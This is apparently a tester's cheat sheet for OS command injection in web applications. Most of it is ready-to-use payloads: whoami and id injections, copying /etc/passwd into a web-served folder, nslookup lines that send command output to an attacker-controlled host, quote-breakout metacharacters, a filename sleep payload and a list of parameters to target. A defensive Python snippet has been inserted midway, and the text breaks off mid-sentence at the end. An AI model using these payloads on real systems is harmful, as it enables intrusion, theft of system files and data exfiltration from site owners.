OS Command Injection

  • If you find any parameter that fetches data, such as "siteID=1", in the HTTP response body, tamper with it using:

; whoami
; id
; pwd
  • Check the feedback form for blind OS command injection by tampering with the email field using the ping command:

||ping -c 5 127.0.0.1||
|| cat /etc/passwd > /var/www/images/passwd.txt -> then access it by tampering with any of the image file requests
  • Check for any out-of-band network interaction using the Burp Collaborator client tab or ngrok:

||nslookup <BURP COLLABORATOR>||
||nslookup <ATTACKER IP>||
||nslookup `whoami` <ATTACKER IP>||
  • Metacharacters for OS command injection attacks, for both UNIX and Windows:

&
&&
|
||
UNIX only:
;
0x0a
\n
`whoami`
$(whoami)

Note

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
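As an added defender-side example (not part of the original checklist), the following Python shows why the metacharacters above matter: a command built by string interpolation is broken out of even inside quotes, exactly as the note describes, while an allowlist check plus an argv list with no shell removes the injection point. The function names, the allowlist pattern and the sample inputs are my own assumptions.

```python
import ipaddress
import re
from typing import List

# Metacharacters from the checklist above (UNIX and Windows), plus the two
# quote characters an attacker needs to terminate a quoted context first.
SHELL_METACHARS = ["&&", "||", "&", "|", ";", "\n", "`", "$(", '"', "'"]


def find_shell_metachars(value: str) -> List[str]:
    """Return which checklist metacharacters occur in an input value.

    Useful for logging or WAF-style detection; it is NOT a substitute for
    the argv-based fix below, because encodings and new syntax slip past it.
    """
    return [m for m in SHELL_METACHARS if m in value]


def ping_vulnerable(host: str) -> str:
    """VULNERABLE pattern: user input interpolated into a shell command line.

    Quoting does not help: a value such as 127.0.0.1'; id; echo ' closes the
    quote, runs a second command, and re-opens a quote so the line stays valid.
    Returns the command string only; nothing is executed here.
    """
    return f"ping -c 5 '{host}'"


def ping_hardened(host: str) -> List[str]:
    """Hardened pattern: validate against an allowlist, then build an argv list.

    Run the result with subprocess.run(argv, shell=False) so no shell ever
    parses the value; the metacharacters above become ordinary bytes.
    A leading '-' is also rejected so the value cannot become a ping option.
    """
    if host.startswith("-"):
        raise ValueError("rejected host value: looks like an option")
    try:
        ipaddress.ip_address(host)          # plain IPv4/IPv6 literal
    except ValueError:
        # Hostname allowlist (assumed policy): letters, digits, dot, hyphen.
        if not re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host):
            raise ValueError("rejected host value: disallowed characters")
    return ["ping", "-c", "5", host]


if __name__ == "__main__":
    sample = "127.0.0.1'; id; echo '"       # constructed quote-breakout input
    print(ping_vulnerable(sample))           # shell would run 'id' here
    print(find_shell_metachars(sample))      # [';', "'"]
    print(ping_hardened("127.0.0.1"))        # ['ping', '-c', '5', '127.0.0.1']
```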

  • While submitting or uploading a file to check for file-upload vulnerabilities, also tamper with the filename parameter to test for blind injection:

`sleep 10`

If you find any search parameter on the domain page, do not hesitate to try:

/?search=%00{.exec|ping 127.0.0.1}
  • Common parameters for testing:

/?query=
/?email=
/?id=
/?username=
/?user=
/?to=
/?from=
/?search=
/?q=
/?s=
/?shopID=
/?blogID=
/?phone=
/?mode=
/?next=
/?firstname=
/?lastname=
/?locale=
/?cmd=
/?sys=
/?system=
  • To automate all of this, there is a good automation tool for detecting command injection vulnerabilities:
